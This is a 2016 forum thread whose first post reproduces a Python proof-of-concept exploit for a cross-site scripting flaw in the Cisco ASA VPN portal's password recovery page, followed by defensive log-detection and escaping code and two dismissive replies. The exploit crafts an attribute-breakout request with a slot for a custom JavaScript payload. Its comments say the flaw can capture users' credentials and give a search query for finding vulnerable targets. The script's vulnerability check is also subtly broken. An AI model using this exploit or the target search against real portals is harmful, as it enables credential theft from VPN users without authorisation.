Guest Zxald Posted February 18, 2016 (edited)

The Cisco ASA VPN Portal password recovery page suffers from a cross-site scripting vulnerability.

```python
# Exploit author: Juan Sacco - jsacco@exploitpack.com
# Affected program: Cisco ASA VPN Portal - Zero Day
# Cisco ASA VPN is prone to a XSS on the password recovery page.
# This vulnerability can be used by an attacker to capture other user's credentials.
# The password recovery form fails to filter properly the hidden inputs fields.
#
# This Zero Day exploit has been developed and discovered by Juan Sacco.
# Exploit Pack - Team http://exploitpack.com
#
# Release Dates:
# Reported to Cisco PSIRT Feb 4/2016
# Cisco Dev Team working on a fix Feb 15/2016
# Cisco PSIRT report a CVE Feb 15/2016
# Exploit Pack disclose the bug Feb 15/2016
# Disclosure of the Exploit Feb 16/2016
#
# Look for vulnerable targets here: https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F
# More than 18.000 results in Google only

import string, sys
import socket, httplib
import telnetlib

def run():
    try:
        Target = sys.argv[1]
        Port = int(sys.argv[2])
        # Here goes your custom JS agent code
        Payload = "alert(1)"
        VulnerableURL = "/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d" + Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
        CraftedRequest = VulnerableURL

        # Start the connection
        connection = httplib.HTTPSConnection(Target)
        connection.request('GET', CraftedRequest)
        Response = connection.getresponse()
        print "Server status response:", Response.status, Response.reason
        data = Response.read()
        vulnerable = "Target is not vulnerable"
        for line in str(data).splitlines():
            if "juansacco\\\"" in line:
                vulnerable = "Target is vulnerable"
        if vulnerable != "Not vulnerable":
            print "Result of the test:", vulnerable
        # Find the injection on the response
        connection.close()
    except Exception,e:
        print "Exploit connection closed " + str(e)

if __name__ == '__main__':
    print "Cisco VPN ASA Exploit - Zero Day"
    print "################################"
    print "Author: Juan Sacco - jsacco@exploitpack.com"

    try:
        Target = sys.argv[1]
        Port = sys.argv[2]
    except IndexError:
        pass
    run()
```

Source

Edited February 18, 2016 by Zxald
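For defenders, the request shape in the script above can be matched in web logs, and the same value rendered safely once it is escaped for a quoted attribute. This is an added example, not part of the original post or of Cisco's code; it assumes combined-format access logs from a proxy in front of the portal, and the function names and sample log lines are constructed for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl

LOGON_PATH = "/+CSCOE+/logon.html"
# A double quote closes the attribute; an on*= token then adds an event handler.
# Heuristic only: tune it against legitimate traffic before alerting on it.
BREAKOUT = re.compile(r'"|\bon[a-z]+\s*=', re.IGNORECASE)

def suspicious_params(request_target):
    """Return names of logon.html query parameters that try to leave an attribute."""
    parts = urlsplit(request_target)
    if parts.path != LOGON_PATH:
        return []
    # parse_qsl percent-decodes, so %22 and %3d are matched as " and =
    return [name for name, value in parse_qsl(parts.query, keep_blank_values=True)
            if BREAKOUT.search(value)]

def hidden_input(name, value):
    """Render a hidden field with the value escaped for a quoted attribute."""
    return '<input type="hidden" name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))

def scan(log_lines):
    """Yield (client, parameter names) for flagged requests in access-log lines."""
    for line in log_lines:
        m = re.match(r'(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"', line)
        if m:
            hits = suspicious_params(m.group(2))
            if hits:
                yield m.group(1), hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Feb/2016:10:00:01 +0000] "GET /+CSCOE+/logon.html?reason=2&username=alice&status=0 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Feb/2016:10:00:05 +0000] "GET /+CSCOE+/logon.html?reason=2&username=juansacco%22%20accesskey%3dX%20onclick%3dalert(1)%20sacco&status=0 HTTP/1.1" 200 5198',
]

if __name__ == "__main__":
    for client, params in scan(SAMPLE_LOG):
        print(client, "attribute breakout attempt in", params)
    print(hidden_input("username", 'juansacco" accesskey=X onclick=alert(1) sacco'))
```

With the quote encoded as `&quot;`, the `accesskey` and `onclick` text stays inside the `value` attribute instead of becoming attributes of the hidden input.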
Nytro Posted February 18, 2016

What? It got posted everywhere as some huge 0day and it's just a crappy XSS?
sleed Posted February 19, 2016

These days XSSes are being called 0days.